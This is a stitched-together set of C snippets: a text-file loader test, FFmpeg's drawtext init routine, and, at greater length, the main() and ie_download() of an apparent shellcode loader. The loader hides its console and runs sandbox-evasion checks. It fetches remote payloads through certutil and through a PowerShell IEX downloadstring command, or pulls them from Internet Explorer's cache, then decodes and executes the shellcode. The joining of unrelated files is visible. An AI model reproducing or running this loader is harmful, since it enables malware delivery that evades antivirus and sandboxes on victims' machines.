int main (int argc, char *argv[]) { char **str; int n, i; if (argc != 2) error1 ("usage: load_textfile filename\n"); n = load_textfile (argv[1], &str); if (n <= 0) error1 ("cannot load %s\n", argv[1]); warning1 ("loaded %d lines from %s\n", n, argv[1]); for (i=0; i<n; i++) printf ("%4d. [%s]\n", i, str[i]); return 0; }
static av_cold int init(AVFilterContext *ctx) { int err; DrawTextContext *s = ctx->priv; Glyph *glyph; if (!s->fontfile && !CONFIG_LIBFONTCONFIG) { av_log(ctx, AV_LOG_ERROR, "No font filename provided\n"); return AVERROR(EINVAL); } if (s->textfile) { if (s->text) { av_log(ctx, AV_LOG_ERROR, "Both text and text file provided. Please provide only one\n"); return AVERROR(EINVAL); } if ((err = load_textfile(ctx)) < 0) return err; } if (s->reload && !s->textfile) av_log(ctx, AV_LOG_WARNING, "No file to reload\n"); if (s->tc_opt_string) { int ret = av_timecode_init_from_string(&s->tc, s->tc_rate, s->tc_opt_string, ctx); if (ret < 0) return ret; if (s->tc24hmax) s->tc.flags |= AV_TIMECODE_FLAG_24HOURSMAX; if (!s->text) s->text = av_strdup(""); } if (!s->text) { av_log(ctx, AV_LOG_ERROR, "Either text, a valid file or a timecode must be provided\n"); return AVERROR(EINVAL); } #if CONFIG_LIBFRIBIDI if (s->text_shaping) if ((err = shape_text(ctx)) < 0) return err; #endif if ((err = FT_Init_FreeType(&(s->library)))) { av_log(ctx, AV_LOG_ERROR, "Could not load FreeType: %s\n", FT_ERRMSG(err)); return AVERROR(EINVAL); } err = load_font(ctx); if (err) return err; if (!s->fontsize) s->fontsize = 16; if ((err = FT_Set_Pixel_Sizes(s->face, 0, s->fontsize))) { av_log(ctx, AV_LOG_ERROR, "Could not set font size to %d pixels: %s\n", s->fontsize, FT_ERRMSG(err)); return AVERROR(EINVAL); } if (s->borderw) { if (FT_Stroker_New(s->library, &s->stroker)) { av_log(ctx, AV_LOG_ERROR, "Coult not init FT stroker\n"); return AVERROR_EXTERNAL; } FT_Stroker_Set(s->stroker, s->borderw << 6, FT_STROKER_LINECAP_ROUND, FT_STROKER_LINEJOIN_ROUND, 0); } s->use_kerning = FT_HAS_KERNING(s->face); /* load the fallback glyph with code 0 */ load_glyph(ctx, NULL, 0); /* set the tabsize in pixels */ if ((err = load_glyph(ctx, &glyph, ' ')) < 0) { av_log(ctx, AV_LOG_ERROR, "Could not set tabsize.\n"); return err; } s->tabsize *= glyph->advance; if (s->exp_mode == EXP_STRFTIME && (strchr(s->text, '%') || strchr(s->text, '\\'))) av_log(ctx, AV_LOG_WARNING, "expansion=strftime is deprecated.\n"); av_bprint_init(&s->expanded_text, 0, AV_BPRINT_SIZE_UNLIMITED); av_bprint_init(&s->expanded_fontcolor, 0, AV_BPRINT_SIZE_UNLIMITED); return 0; }
int main (int argc, char **argv) { #ifdef QUIET ShowWindow(GetConsoleWindow(), SW_HIDE); #endif char *fvalue = NULL; char *uvalue = NULL; int index; int c; opterr = 0; // do evading here with fopen technique #ifdef SANDBOX_FOPEN #ifdef PRINT_DEBUG printf("use fopen sandbox escape\n"); #endif FILE *fp = fopen("c:\\windows\\system.ini", "rb"); if (fp == NULL) return 0; fclose(fp); #endif //evading with gethostbyname technique #ifdef KVALUE #ifdef PRINT_DEBUG printf("use gethostbyname sandbox evasion\n"); #endif struct hostent *hp = gethostbyname(KVALUE); if (hp != NULL) exit(0); #endif //#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL) //download a file and write to disk #ifdef DOWNLOADCERTUTIL char download[500]; //how not to do it... sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]); #ifdef PRINT_DEBUG printf("url: %s\n", download); #endif system(download); #ifdef PRINT_DEBUG printf("download done\n"); #endif #endif #ifdef DOWNLOADPOWERSHELL char download[500]; sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]); #ifdef PRINT_DEBUG printf("url: %s\n", download); #endif system(download); #endif #ifdef LVALUE fvalue=argv[1]; #endif #ifdef PRINT_DEBUG printf ("fvalue = %s ", fvalue); printf ("uvalue = %s \n", uvalue); for (index = optind; index < argc; index++) printf ("Non-option argument %s\n", argv[index]); #endif // compute #defines from defs.h #ifdef FVALUE int size = strlen(FVALUE); fvalue=(char*)malloc(size); strcpy(fvalue,FVALUE); #endif #ifdef UVALUE int size = strlen(UVALUE); uvalue=(char*)malloc(size); strcpy(uvalue,UVALUE); #endif // exec shellcode from a given file or from defs.h if (fvalue) { unsigned char *buffer; unsigned char *shellcode; int size; //#ifndef FVALUE #ifdef LVALUE #ifdef PRINT_DEBUG printf("exec shellcode from file\n"); #endif size = get_filesize(fvalue); buffer = load_textfile(fvalue, buffer, size); #endif #ifdef FVALUE size = strlen (FVALUE); buffer = FVALUE; #endif #ifdef ENCRYPT #ifdef PRINT_DEBUG printf ("size %d\n",size); //printf ("%s\n",FVALUE); printf("exec shellcode with decode_shellcode\n"); #endif shellcode = decode_shellcode(buffer,shellcode,size); #endif #ifndef ENCRYPT #ifdef LVALUE unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l #endif #ifndef ASCIIMSF #ifndef DOWNLOADEXECSC #ifdef PRINT_DEBUG printf("exec shellcode without decode_shellcode\n"); #endif shellcode = buf; #endif #endif #endif #ifndef X64 #ifndef ASCIIMSF exec_shellcode(shellcode); #endif #ifdef ASCIIMSF exec_shellcode_ASCIIMSF(shellcode); #endif #endif #ifdef X64 exec_shellcode64(shellcode); #endif } // exec from url #ifdef UVALUE else if (uvalue) { #ifdef PRINT_DEBUG printf("exec shellcode from url\n"); #endif char *sh_filename; sh_filename = ie_download(uvalue, sh_filename); int x=strlen(sh_filename); #ifdef PRINT_DEBUG printf("\n\n%d\n\n", x); #endif unsigned char *buffer; unsigned char *shellcode; int size = get_filesize(sh_filename); buffer = load_textfile(sh_filename, buffer, size); #ifdef ENCRYPT shellcode = decode_shellcode(buffer,shellcode,size); #else shellcode = buf; #endif #ifndef X64 exec_shellcode(shellcode); #endif #ifdef X64 exec_shellcode64(shellcode); #endif } #endif #ifdef DOWNLOADEXECSC unsigned char *shellcode = downloadshellcode(argv[1]); #ifndef X64 exec_shellcode(shellcode); #endif #ifdef X64 exec_shellcode64(shellcode); #endif #endif return 0; }
// return pointer to the filename char* ie_download(char* string, char* sh_filename) { char ie[500]; GetEnvironmentVariable("PROGRAMFILES",ie,100); strcat(ie,"\\Internet Explorer\\iexplore.exe"); ShellExecute(0, "open", ie , string, NULL, SW_SHOWDEFAULT); // wait a little until the file is loaded Sleep(8000); // get the filename to search format in the ie temp directory char delimiter[] = "/"; char *ptr; char *fname; ptr = strtok(string, delimiter); while(ptr != NULL) { fname = ptr; ptr = strtok(NULL, delimiter); } #ifdef PRINT_DEBUG printf("ie_download, filename: %s\n", fname); #endif // split the filename char delimiter2[] = "."; char *sname; ptr = strtok(fname, delimiter2); sname = ptr; ptr = strtok(NULL, delimiter2); #ifdef PRINT_DEBUG printf("ie_download, name to search for: %s\n", sname); #endif // search for the file in user profile // build searchstring char tmp[150]; char tmp_home[150]; GetEnvironmentVariable ("USERPROFILE",tmp_home,150); GetEnvironmentVariable ("TEMP",tmp,150); tmp [ strlen(tmp) - 5 ] = 0x0; //printf("\n\n%s\n\n",tmp); char searchstring[500] = "/C "; strncat (searchstring,tmp_home,1); strcat (searchstring,": && cd \""); strcat (searchstring,tmp); strcat (searchstring,"\" && dir . /s /b | find \""); strcat (searchstring,sname); strcat (searchstring,"\" > \""); strcat (searchstring,tmp_home); strcat (searchstring,"\\shellcodefile.txt\""); #ifdef PRINT_DEBUG printf ("ie_download, searchstring: %s\n", searchstring); #endif // build & execute cmd char cmd[500]; GetEnvironmentVariable ("WINDIR",cmd,500); strcat (cmd,"\\system32\\cmd.exe"); ShellExecute (0, "open", "cmd.exe" , searchstring, NULL, SW_SHOWDEFAULT); //now read the directory + filename from the textfile char dirfile[500] = {0}; strcat (dirfile, tmp_home); strcat (dirfile, "\\shellcodefile.txt"); //char *sh_filename; int size_sh_filename=0; int counter = 0; while(size_sh_filename==0 && counter <= 1000) { size_sh_filename = get_filesize (dirfile); Sleep(500); counter++; } sh_filename = load_textfile (dirfile, sh_filename, size_sh_filename); // there is always emtpy space at the end of the file -> delete that sh_filename[size_sh_filename-2]=0x0; #ifdef PRINT_DEBUG printf ("ie_download, sh_filename: >>>%s<<<, size: %d\ntest\n", sh_filename, size_sh_filename); #endif return sh_filename; }